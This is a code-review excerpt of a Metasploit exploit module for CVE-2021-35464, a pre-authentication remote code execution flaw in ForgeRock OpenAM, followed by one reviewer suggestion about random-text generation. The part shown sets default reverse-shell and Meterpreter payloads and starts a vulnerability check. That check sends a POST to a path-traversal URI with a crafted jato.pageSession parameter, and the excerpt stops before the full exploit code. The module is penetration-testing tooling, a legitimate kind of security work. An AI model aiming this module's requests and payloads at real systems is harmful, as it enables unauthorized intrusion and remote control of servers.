modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb

```diff
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::JavaDeserialization
+
+  def initialize(info = {})
+    super(
+        update_info(
+          info,
+          'Name' => '',
+          'Description' => %q{
+          },
+          'Author' => [
+            'Michael Stepankin', # Original Discovery
+            'bwatters-r7',        # Msf module
+            'Spencer McIntyre',   # All of the Help
+            'jheysel-r7'          # Check Method
+          ],
+          'References' => [
+            ['CVE', '2021-35464'],
+            ['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'],
+            ['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244']
+          ],
+          'DisclosureDate' => '2021-06-29',
+          'License' => MSF_LICENSE,
+          'Platform' => ['unix', 'linux'],
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Privileged' => false,
+          'Targets' => [
+            [
+              'Unix Command',
+              {
+                'Platform' => 'unix',
+                'Arch' => ARCH_CMD,
+                'Type' => :unix_cmd,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+                }
+              }
+            ],
+            [
+              'Linux Dropper',
+              {
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Type' => :linux_dropper,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ]
+          ],
+          'DefaultTarget' => 1,
+          'DefaultOptions' => {
+            'SSL' => false
+          },
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+          }
+        )
+    )
+    register_options([
+      Opt::RPORT(7080),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/openam/oauth2/..;/ccversion/Version'),
+      'vars_get' => {
+        'jato.pageSession' => Base64.urlsafe_encode64(Rex::Text.rand_text_alphanumeric(6..13))
```

Comment:
```suggestion
        'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
```

Exploit method is badchar-aware and closer to the source.